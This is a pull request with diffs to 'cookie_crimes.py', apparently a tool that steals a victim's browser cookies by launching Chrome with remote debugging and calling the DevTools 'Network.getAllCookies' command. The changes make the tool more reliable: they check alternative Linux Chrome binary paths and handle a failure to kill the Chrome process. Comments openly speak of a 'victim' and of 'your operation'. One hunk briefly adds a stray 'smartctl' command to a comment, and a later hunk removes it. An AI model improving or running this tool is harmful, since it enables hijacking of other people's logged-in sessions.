### PR TITLE
 Check for alternative names for Chrome Linux binary, don't crash if unable to kill Chrome process

### DIFF
--- a/cookie_crimes.py
+++ b/cookie_crimes.py
@@ -106,8 +106,6 @@ def summon_forbidden_protocol():
                                stdout=subprocess.DEVNULL,
                                stderr=subprocess.DEVNULL)
 
-    print(CHROME_DEBUGGING_CMD)
-
     # Hey some people have slow computers, quite possibly because of
     # all the malware you're running on them.
     time.sleep(5)

--- a/cookie_crimes.py
+++ b/cookie_crimes.py
@@ -11,7 +11,8 @@ import requests
 import websocket
 
 # Edit this if you want to use a profile other than the default Chrome profile. Usually the profiles are called "Profile 1" etc. To list Chrome profiles, look in the Chrome User Data Directory for your OS.
-# If you don't know what this is, don't change it.
+#smartctl -l scterc,50,50 /dev If you don't know what this is, don't change it.
+
 PROFILE_NAME = "Default"
 
 REMOTE_DEBUGGING_PORT = 9222
@@ -21,7 +22,7 @@ GET_ALL_COOKIES_REQUEST = json.dumps({"id": 1, "method": "Network.getAllCookies"
 if sys.platform.startswith("linux"):
     CHROME_CMD = "google-chrome"
 
-    LINUX_CHROME_CMDS = ["/usr/bin/google-chrome-stable", "/usr/bin/google-chrome-stable", "/usr/bin/google-chrome"]
+    LINUX_CHROME_CMDS = ["/usr/bin/google-chrome-stable", "/usr/bin/google-chrome-beta", "/usr/bin/google-chrome"]
     for cmd in LINUX_CHROME_CMDS:
         if os.path.isfile(cmd):
             CHROME_CMD = cmd

--- a/cookie_crimes.py
+++ b/cookie_crimes.py
@@ -20,6 +20,12 @@ GET_ALL_COOKIES_REQUEST = json.dumps({"id": 1, "method": "Network.getAllCookies"
 # Edit these if your victim has a wacky Chrome install.
 if sys.platform.startswith("linux"):
     CHROME_CMD = "google-chrome"
+
+    LINUX_CHROME_CMDS = ["/usr/bin/google-chrome-stable", "/usr/bin/google-chrome-stable", "/usr/bin/google-chrome"]
+    for cmd in LINUX_CHROME_CMDS:
+        if os.path.isfile(cmd):
+            CHROME_CMD = cmd
+
     USER_DATA_DIR = "$HOME/.config/google-chrome/"
 
 elif sys.platform == "darwin":
@@ -100,6 +106,8 @@ def summon_forbidden_protocol():
                                stdout=subprocess.DEVNULL,
                                stderr=subprocess.DEVNULL)
 
+    print(CHROME_DEBUGGING_CMD)
+
     # Hey some people have slow computers, quite possibly because of
     # all the malware you're running on them.
     time.sleep(5)
@@ -127,7 +135,10 @@ def cleanup(chrome_process):
     # I SURE HOPE there's no race condition, causing this to kill some other
     # innocent PID, crashing the victim's computer and ruining your operation.
 
-    os.kill(chrome_process.pid + 1, signal.SIGKILL)
+    try:
+        os.kill(chrome_process.pid + 1, signal.SIGKILL)
+    except ProcessLookupError:
+        print("Unable to kill the chrome process, do it manually!")
 
     # If we copied a Profile's User Data Directory somewhere, clean it up.
     if fake_user_data_dir is not None:

--- a/cookie_crimes.py
+++ b/cookie_crimes.py
@@ -11,7 +11,7 @@ import requests
 import websocket
 
 # Edit this if you want to use a profile other than the default Chrome profile. Usually the profiles are called "Profile 1" etc. To list Chrome profiles, look in the Chrome User Data Directory for your OS.
-#smartctl -l scterc,50,50 /dev If you don't know what this is, don't change it.
+# If you don't know what this is, don't change it.
 
 PROFILE_NAME = "Default"
 


### PR DESCRIPTION
On my Arch Linux install, the chrome command is: google-chrome-stable. Also the program crashed when trying to kill the Chrome process.

This change checks for alternative names of the chrome command and also prints an error if it's unable to kill the Chrome process.

Probably you should find a more reliable way to determine the chrome pid.